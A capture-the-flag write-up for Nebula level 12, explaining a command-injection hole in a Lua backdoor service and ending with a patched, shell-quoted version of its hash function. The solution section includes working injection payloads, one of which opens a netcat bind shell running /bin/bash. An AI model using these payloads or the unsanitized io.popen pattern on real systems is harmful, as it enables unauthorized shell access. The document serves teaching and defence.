Nebula - Level12 - Backdoor Program
About
There is a backdoor process listening on port 50001.
To do this level, log in as the level12 account with the password
level12. Files for this level can be found in /home/flag12.
Source code
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
    prog = io.popen("echo "..password.." | sha1sum", "r")
    data = prog:read("*all")
    prog:close()
    data = string.sub(data, 1, 40)
    return data
end

while 1 do
    local client = server:accept()
    client:send("Password: ")
    client:settimeout(60)
    local line, err = client:receive()
    if not err then
        print("trying " .. line) -- log from where ;\
        local h = hash(line)
        if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
            client:send("Better luck next time\n");
        else
            client:send("Congrats, your token is 413**CARRIER LOST**\n")
        end
    end
    client:close()
end
Solution
Note the line prog = io.popen("echo "..password.." | sha1sum", "r"). The password is supplied by the
client and concatenated straight into a shell command without any form of sanitization. This allows an
attacker to enter

echo "4754a4f4bd5787accd33de887b9250a0691dd198#" | nc 127.0.0.1 50001

as the password, which comments out the rest of the line and simply returns the hash. But what if we do
not have the hash? The lack of sanitization allows an arbitrary command sequence to be entered, so we can
establish a bind shell with nc. To do this, use

echo '""; nc.traditional -lkp 5002 -e /bin/bash; #' | nc 127.0.0.1 50001

Connect to the shell with nc 127.0.0.1 5002.
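As an added example (not part of the level or of this write-up), the same hash() routine with the injection point closed: Lua 5.1 cannot start a process without going through /bin/sh, so the input is rejected if it carries control characters and otherwise single-quoted for the shell before it reaches io.popen.

```lua
-- Quote a string for /bin/sh: wrap it in single quotes and turn each embedded
-- ' into '\'' so nothing inside the value can end the quoting. gsub returns
-- two values, so the parentheses keep only the rewritten string.
local function shell_quote(s)
  return "'" .. (s:gsub("'", "'\\''")) .. "'"
end

local function hash(password)
  -- A NUL, newline or other control character is never a legitimate password
  -- here; refuse it instead of handing it to the shell.
  if password:find("%c") then
    return nil, "control character in password"
  end
  -- printf rather than echo, so input such as "-n" or "-e" is data, not an
  -- option. The trailing \n keeps the digest identical to the original
  -- 'echo <password> | sha1sum', so the stored hash does not change.
  local cmd = "printf '%s\\n' " .. shell_quote(password) .. " | sha1sum"
  local prog = io.popen(cmd, "r")
  local data = prog:read("*all")
  prog:close()
  return string.sub(data, 1, 40)
end

local EXPECTED = "4754a4f4bd5787accd33de887b9250a0691dd198"

-- True only when the digest matches; a rejected input is reported to the
-- client exactly like a wrong password, not as a distinguishable error.
local function check(password)
  local h = hash(password)
  return h ~= nil and h == EXPECTED
end

-- The payload from the write-up above is now just a long wrong password: the
-- shell sees it inside single quotes and sha1sum hashes it as plain text.
print(check('""; nc.traditional -lkp 5002 -e /bin/bash; #'))
```

The original's print("trying " .. line) writes every submitted line, injected commands included, to the process's stdout, so whatever captures that output is where attempts against this service show up.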